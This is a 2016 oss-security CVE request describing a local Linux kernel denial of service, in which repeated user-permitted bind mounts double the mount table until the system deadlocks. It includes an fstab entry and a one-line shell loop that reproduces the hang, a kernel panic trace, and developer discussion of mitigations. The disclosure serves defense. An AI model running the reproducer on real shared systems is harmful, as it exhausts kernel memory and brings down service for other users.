Date: Wed, 13 Jul 2016 10:52:44 -0400 (EDT)
From: CAI Qian <caiqian@...hat.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: cve request: local DoS by overflowing kernel mount table using shared bind mount

Below is the discussion between myself and staff from security@...nel.org.
   CAI Qian

=== Initial Report ===
It was reported that the mount table grows by a factor of two with each bind
mount command. This is a change of behavior from the older kernel (i.e.,
2.6.18). Hence, the older kernel is either unaffected or harder to exploit.

If the system is configured so that a non-root user is allowed to bind mount,
even with a limit on the number of bind mounts allowed, a non-root user could
cause a local DoS by quickly overflowing the mount table.

For example,

$ cat /etc/fstab
...
/tmp/1 /tmp/2 none user,bind 0 0

Even if the application allowed only, say, 30 bind mounts to increase security:

$ for i in `seq 1 20`; do mount /tmp/1; done
$ mount | wc -l
1048606

Once this happens, it causes a deadlock for the whole system,

[ 361.301885] NMI backtrace for cpu 0
[ 361.302352] CPU: 0 PID: 29 Comm: kworker/0:1 Not tainted 3.10.0-327.10.1.el7.x86_64 #1
[ 361.303062] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.8.1-20150318_183358- 04/01/2014
[ 361.303882] Workqueue: events qxl_fb_work [qxl]
[ 361.304379] task: ffff88013943d080 ti: ffff8801395ec000 task.ti: ffff8801395ec000
[ 361.305057] RIP: 0010:[<ffffffff811e0b33>] [<ffffffff811e0b33>] prune_super+0x23/0x170
[ 361.305784] RSP: 0000:ffff8801395ef5c0 EFLAGS: 00000206
[ 361.306318] RAX: 0000000000000080 RBX: ffff8801394243b0 RCX: 0000000000000000
[ 361.306973] RDX: 0000000000000000 RSI: ffff8801395ef710 RDI: ffff8801394243b0
[ 361.307628] RBP: ffff8801395ef5e8 R08: 0000000000000000 R09: 0000000000000040
[ 361.308282] R10: 0000000000000000 R11: 0000000000000220 R12: ffff8801395ef710
[ 361.308939] R13: ffff880139424000 R14: ffff8801395ef710 R15: 0000000000000000
[ 361.309599] FS: 0000000000000000(0000) GS:ffff88013fc00000(0000) knlGS:0000000000000000
[ 361.310320] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 361.310893] CR2: 00007fea0c55dc3d CR3: 00000000b770d000 CR4: 00000000003406f0
[ 361.311561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 361.312227] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 361.312894] Stack:
[ 361.313223] 0000000000000400 ffff8801395ef710 ffff8801394243b0 0000000000000258
[ 361.313950] 0000000000000000 ffff8801395ef688 ffffffff8117c46b 0000000000000000
[ 361.314858] ffff8801395ef630 ffffffff811d5e21 ffff8801395ef720 0000000000000036
[ 361.315615] Call Trace:
[ 361.315995] [<ffffffff8117c46b>] shrink_slab+0xab/0x300
[ 361.316559] [<ffffffff811d5e21>] ? vmpressure+0x21/0x90
[ 361.317114] [<ffffffff8117f6a2>] do_try_to_free_pages+0x3c2/0x4e0
[ 361.317727] [<ffffffff8117f8bc>] try_to_free_pages+0xfc/0x180
[ 361.318309] [<ffffffff811735bd>] __alloc_pages_nodemask+0x7fd/0xb90
[ 361.318927] [<ffffffff811b4429>] alloc_pages_current+0xa9/0x170
[ 361.319513] [<ffffffff811be9ec>] new_slab+0x2ec/0x300
[ 361.320045] [<ffffffff8163220f>] __slab_alloc+0x315/0x48f
[ 361.320596] [<ffffffff811e064c>] ? get_empty_filp+0x5c/0x1a0
[ 361.321161] [<ffffffff811c0fb3>] kmem_cache_alloc+0x193/0x1d0
[ 361.321735] [<ffffffff811e064c>] ? get_empty_filp+0x5c/0x1a0
[ 361.322295] [<ffffffff811e064c>] get_empty_filp+0x5c/0x1a0
[ 361.322845] [<ffffffff811e07ae>] alloc_file+0x1e/0xf0
[ 361.323362] [<ffffffff81182773>] __shmem_file_setup+0x113/0x1f0
[ 361.323940] [<ffffffff81182860>] shmem_file_setup+0x10/0x20
[ 361.324496] [<ffffffffa039f5ab>] drm_gem_object_init+0x2b/0x40 [drm]
[ 361.325103] [<ffffffffa0422c3d>] qxl_bo_create+0x7d/0x190 [qxl]
[ 361.325680] [<ffffffffa042798c>] ? qxl_release_list_add+0x5c/0xc0 [qxl]
[ 361.326299] [<ffffffffa0424066>] qxl_alloc_bo_reserved+0x46/0xb0 [qxl]
[ 361.326912] [<ffffffffa0424fde>] qxl_image_alloc_objects+0xae/0x140 [qxl]
[ 361.327544] [<ffffffffa042556e>] qxl_draw_opaque_fb+0xce/0x3c0 [qxl]
[ 361.328145] [<ffffffffa0421ee2>] qxl_fb_dirty_flush+0x1a2/0x260 [qxl]
[ 361.328754] [<ffffffffa0421fb9>] qxl_fb_work+0x19/0x20 [qxl]
[ 361.329306] [<ffffffff8109d5db>] process_one_work+0x17b/0x470
[ 361.329865] [<ffffffff8109e3ab>] worker_thread+0x11b/0x400
[ 361.330393] [<ffffffff8109e290>] ? rescuer_thread+0x400/0x400
[ 361.330940] [<ffffffff810a5acf>] kthread+0xcf/0xe0
[ 361.331419] [<ffffffff810a5a00>] ? kthread_create_on_node+0x140/0x140
[ 361.332005] [<ffffffff81645998>] ret_from_fork+0x58/0x90
[ 361.332513] [<ffffffff810a5a00>] ? kthread_create_on_node+0x140/0x140
[ 361.333093] Code: 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 49 89 f6 41 55 4c 8d af 50 fc ff ff 41 54 53 4c 8b 46 08 48 89 fb <4d> 85 c0 74 09 f6 06 80 0f 84 2f 01 00 00 48 8b 83 80 fc ff ff
[ 361.335906] Kernel panic - not syncing: hung_task: blocked tasks

=== From Al Viro ===
The number of vfsmounts getting propagation from /tmp is doubling on each
step. You are asking to take a subtree at /tmp/2 and attach it to /tmp/1 *and*
*all* *existing* peers. Turning all copies into peers of what was on /tmp/2.

So after the first mount --bind you get two vfsmounts - /tmp and /tmp/1. And
the damn things are peers - you mount anything on /tmp/1/shit, you get its
clone attached to the matching directory (/2/shit) in /tmp.

After the second mount --bind you've got two more vfsmounts - one overmounting
/tmp/1 and another - /tmp/2. And again, all of them constitute one peer group.
With 4 elements now. Etc.

=== From Eric W. Biederman ===
First let's be clear, it is systemd that calls MS_SHARED|MS_REC on /.
Furthermore, the configuration interface for mount propagation is error prone
and pretty much requires the most problematic cases be the default, making the
interfaces very easy to use incorrectly. Especially for code that was only
tested on systems prior to systemd.

All of this is currently allowed if a user namespace creates a mount namespace,
so the concern is real.

Of course we also allow using as much memory as we want with virtual addresses
as well. It is slightly worse on 32bit in that it is kernel memory we are
consuming and not user memory. Still, it is just another form of unlimited
memory consumption that is causing the problem. We have cases where in typical
deployments we allow users to consume all of the memory on the system.

That said, this definitely is a case where we could set a reasonable upper
limit on the number of mount objects and catch it when people do crazy things
by accident before the system gets stuck in an OOM. I am in the process of
cooking up a number of limits of that kind and I will see about adding a limit
on the number of mounts as well.
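
The doubling described in this thread can be checked with a little arithmetic. The following is only a rough model in Python, not kernel code: it assumes the shared peer group holds exactly 2^n vfsmounts after n bind mounts, and that a fixed number of other mounts sits outside it. The function names, the baseline of 30 (inferred from 1048606 - 2^20, not stated in the thread), and the cap of 100000 are all hypothetical choices for illustration.

```python
def peer_group_size(bind_mounts: int) -> int:
    """Model: the peer group doubles with every bind mount, starting from 1."""
    return 2 ** bind_mounts


def total_mounts(bind_mounts: int, baseline: int) -> int:
    """Peer group plus `baseline` mounts outside it (baseline is an assumption)."""
    return baseline + peer_group_size(bind_mounts)


def steps_until_limit(baseline: int, limit: int) -> int:
    """Smallest number of bind mounts whose modelled total exceeds `limit`.

    `limit` stands in for a hypothetical cap on mount objects; the value
    used below is illustrative only.
    """
    steps = 0
    while total_mounts(steps, baseline) <= limit:
        steps += 1
    return steps


if __name__ == "__main__":
    # 20 bind mounts with an inferred baseline of 30 other mounts.
    print(total_mounts(20, baseline=30))
    # Peer group size if an application-level cap of 30 bind mounts were reached.
    print(peer_group_size(30))
    # Bind mounts needed to pass a hypothetical cap of 100000 mounts.
    print(steps_until_limit(baseline=30, limit=100_000))
```

Under these assumptions, 20 bind mounts give 30 + 2^20 = 1048606, which matches the `mount | wc -l` figure in the initial report, and a per-application cap of 30 bind mounts would still permit a peer group of 2^30 entries. A cap on the total number of mount objects, as suggested above, would be reached after only a handful of steps.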